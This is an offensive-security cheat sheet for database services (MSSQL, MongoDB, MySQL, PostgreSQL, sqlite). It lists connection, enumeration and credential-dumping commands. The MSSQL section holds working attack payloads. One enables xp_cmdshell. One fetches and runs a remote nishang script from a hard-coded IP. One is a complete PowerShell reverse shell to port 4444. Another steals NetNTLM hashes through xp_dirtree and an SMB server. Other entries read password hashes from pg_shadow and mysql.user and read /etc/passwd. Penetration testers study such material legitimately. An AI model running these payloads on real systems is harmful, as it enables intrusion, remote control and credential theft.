Database Analysis
impacket-mssqlclient
Connection
impacket-mssqlclient <USERNAME>@<RHOST>
impacket-mssqlclient <USERNAME>@<RHOST> -windows-auth
impacket-mssqlclient -k -no-pass <RHOST>
impacket-mssqlclient <RHOST>/<USERNAME>:<USERNAME>@<RHOST> -windows-authexport KRB5CCNAME=<USERNAME>.ccache
impacket-mssqlclient -k <RHOST>.<DOMAIN>Common Commands
enum_logins
enum_impersonateMongoDB
mongo "mongodb://localhost:27017"> use <DATABASE>;
> show tables;
> show collections;
> db.system.keys.find();
> db.users.find();
> db.getUsers();
> db.getUsers({showCredentials: true});
> db.accounts.find();
> db.accounts.find().pretty();
> use admin;MSSQL
Connection
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>'
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>' -Q "<mssql query>"
impacket-mssqlclient <USERNAME>:<PASSWORD>@<RHOST> -windows-authCommon Commands
SELECT @@version;
// List databases
SELECT name FROM master..sysdatabases;
SELECT name FROM master.sys.databases;
// Use a database
USE <database>
// List Tables
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM <DBNAME>..sysobjects WHERE xtype='U'
// List Columns
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
// Concatenation
SELECT user +':'+ password from Users
// Select a table from a database in specific
USE <database>; SELECT * from UsersCheck privileges
SELECT IS_SRVROLEMEMBER('sysadmin')Enable xp_cmdshell (With privileges)
enable_xp_cmdshellFor establishing reverse shell (rev.ps1 is nishang shell):
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.8.6.125/rev.ps1") | powershell -noprofile'
EXEC xp_cmdshell 'powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TCPClient(''10.8.6.125'',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1 | Out-String );$r2=$r+''PS ''+$env:COMPUTERNAME+''> ''; $s.Write(([text.encoding]::ASCII).GetBytes($r2),0,$r2.Length)}"'Steal NetNTLM Hash / Relay Attack (Without privileges)
Though we can’t execute commands using xp_cmdshell we can steal hashes of the SQL service account by using xp_dirtree or xp_fileexist.
exec xp_dirtree '\\<ip>\smbFolder\file'And with the smbserver grab the hash:
impacket-smbserver smbFolder $(pwd) -smb2supportMySQL
Connection
mysql -u root -p
mysql -u <USERNAME> -h <RHOST> -pCommon commands
mysql> STATUS;
mysql> SHOW databases;
mysql> USE <DATABASE>;
mysql> SHOW tables;
mysql> DESCRIBE <TABLE>;
mysql> SELECT version();
mysql> SELECT system_user();
mysql> SELECT * FROM Users;
mysql> SELECT * FROM users \G;
mysql> SELECT Username,Password FROM Users;
musql> SELECT user, authentication_string FROM mysql.user WHERE user = '<USERNAME>';
mysql> SELECT LOAD_FILE('/etc/passwd');
mysql> SELECT LOAD_FILE('C:\\PATH\\TO\\FILE\\<FILE>');
mysql> SHOW GRANTS FOR '<USERNAME>'@'localhost' \G;PostgreSQL
psql
psql -h <LHOST> -U <USERNAME> -c "<COMMAND>;"
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>Common Commands
postgres=# \list // list all databases
postgres=# \c // use database
postgres=# \c <DATABASE> // use specific database
postgres=# \s // command history
postgres=# \q // quit
<DATABASE>=# \dt // list tables from current schema
<DATABASE>=# \dt *.* // list tables from all schema
<DATABASE>=# \du // list users roles
<DATABASE>=# \du+ // list users roles
<DATABASE>=# SELECT user; // get current user
<DATABASE>=# TABLE <TABLE>; // select table
<DATABASE>=# SELECT * FROM users; // select everything from users table
<DATABASE>=# SHOW rds.extensions; // list installed extensions
<DATABASE>=# SELECT usename, passwd from pg_shadow; // read credentialssqlite3
sqlite3 <FILE>.dbsqlite> .tables
sqlite> PRAGMA table_info(<TABLE>);
sqlite> SELECT * FROM <TABLE>;Last updated